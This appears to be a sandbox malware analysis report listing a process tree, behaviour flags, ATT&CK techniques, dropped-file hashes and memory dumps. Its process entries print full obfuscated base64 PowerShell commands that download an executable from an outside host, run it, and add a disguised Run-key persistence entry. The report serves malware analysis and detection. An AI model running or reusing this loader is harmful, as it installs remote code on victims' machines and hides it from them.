QQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:64
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1508

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
bad2a3ab77612bdcfd201239b5857165

SHA1
8d517d7c15dc0d531334581acbd9cc13fa782ff7

SHA256
75812bcc47036aba4b43cc05b954aa6b65df7b652d737345bb718910c174c867

SHA512
250fbfd7cce54e02c2aa560e83b9cca0c1d899c35cab4126f68b8a7722552f1913e348524f6cb2b1f44d539f93b8e21f228870e1fbab1422eba52f6a6311649d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
0c9b6f689cb571dfd87ef38197403574

SHA1
6585770d9017e9302c8b13c74c5fb9927d28526a

SHA256
e34d004e57d5ae908ead1c65b7f753db56a28d513375365c87a4bae727b83034

SHA512
94af37475a69d49b03134dae5964176d8c61bc0b9e7c4f1cb881fc715b78dd71405dbbe3b366da499f3ceb667ef2d07c050fba512add87add1864a6d4e48459f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
8d3269667aa9bf6150c6eebea7b13416

SHA1
a8d8de06e591b47e46d4e19df463fbe50b086500

SHA256
fd0f5713057194525b14115fb4d6008a9562c6097e6f3576eb7b23c5a8569573

SHA512
10d182df28d7e598efc03b4eda19a6285f86830e41a46b47121ed71c8a152db9a12a1233badf11c0b8d529459ce463cb41fce04cdae7794157ef3e25808c8492

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
a4dbffb278f2c211fa57b9c3ff56b7a6

SHA1
fe643ac5d952bd0b80d46ff698b05ad971b7dae4

SHA256
edf31d7be7bbfdc9e3c11de5f6c647f8218050f669077eaecfa3f7987aa1268a

SHA512
b8d4cff42d55ac079de6fb2a4c65934f917260586f33584b797f765853a525713cae3844ff160c5f1067cf5675e709db528cff590a66f64c5cd8c3846d324a62

Download Submit
memory/64-325-0x0000000000000000-mapping.dmp

Download
memory/64-460-0x000002031FC46000-0x000002031FC48000-memory.dmp

Filesize
8KB

Download
memory/64-338-0x000002031FC40000-0x000002031FC42000-memory.dmp

Filesize
8KB

Download
memory/64-339-0x000002031FC43000-0x000002031FC45000-memory.dmp

Filesize
8KB

Download
memory/632-323-0x0000000000000000-mapping.dmp

Download
memory/1508-348-0x00000183B1123000-0x00000183B1125000-memory.dmp

Filesize
8KB

Download
memory/1508-347-0x00000183B1120000-0x00000183B1122000-memory.dmp

Filesize
8KB

Download
memory/1508-344-0x00000183971E0000-0x00000183971E2000-memory.dmp

Filesize
8KB

Download
memory/1508-343-0x00000183971E0000-0x00000183971E2000-memory.dmp

Filesize
8KB

Download
memory/1508-341-0x0000000000000000-mapping.dmp

Download
memory/1508-498-0x00000183B1126000-0x00000183B1128000-memory.dmp

Filesize
8KB

Download
memory/1544-264-0x0000000000000000-mapping.dmp

Download
memory/1768-340-0x0000000000000000-mapping.dmp

Download
memory/2224-286-0x0000000000000000-mapping.dmp

Download
memory/3948-287-0x0000000000000000-mapping.dmp

Download
memory/3948-293-0x000001EB7BE60000-0x000001EB7BE62000-memory.dmp

Filesize
8KB

Download
memory/3948-294-0x000001EB7BE63000-0x000001EB7BE65000-memory.dmp

Filesize
8KB

Download
memory/3948-385-0x000001EB7BE66000-0x000001EB7BE68000-memory.dmp

Filesize
8KB

Download
memory/4104-310-0x000002CDFCBF0000-0x000002CDFCBF2000-memory.dmp

Filesize
8KB

Download
memory/4104-311-0x000002CDFCBF3000-0x000002CDFCBF5000-memory.dmp

Filesize
8KB

Download
memory/4104-457-0x000002CDFCBF6000-0x000002CDFCBF8000-memory.dmp

Filesize
8KB

Download
memory/4104-305-0x0000000000000000-mapping.dmp

Download
memory/4640-282-0x0000012988360000-0x0000012988362000-memory.dmp

Filesize
8KB

Download
memory/4640-269-0x0000000000000000-mapping.dmp

Download
memory/4640-283-0x0000012988363000-0x0000012988365000-memory.dmp

Filesize
8KB

Download
memory/4640-277-0x00000129A0B50000-0x00000129A0B51000-memory.dmp

Filesize
4KB

Download
memory/4640-274-0x0000012988870000-0x0000012988871000-memory.dmp

Filesize
4KB

Download
memory/4640-349-0x0000012988366000-0x0000012988368000-memory.dmp

Filesize
8KB

Download
memory/4648-123-0x000001F27C810000-0x000001F27E705000-memory.dmp

Filesize
31.0MB

Download
memory/4648-122-0x00007FFA58E30000-0x00007FFA59F1E000-memory.dmp

Filesize
16.9MB

Download
memory/4648-114-0x00007FF773EB0000-0x00007FF777466000-memory.dmp

Filesize
53.7MB

Download
memory/4648-121-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4648-118-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4648-117-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4648-116-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4648-115-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4760-304-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads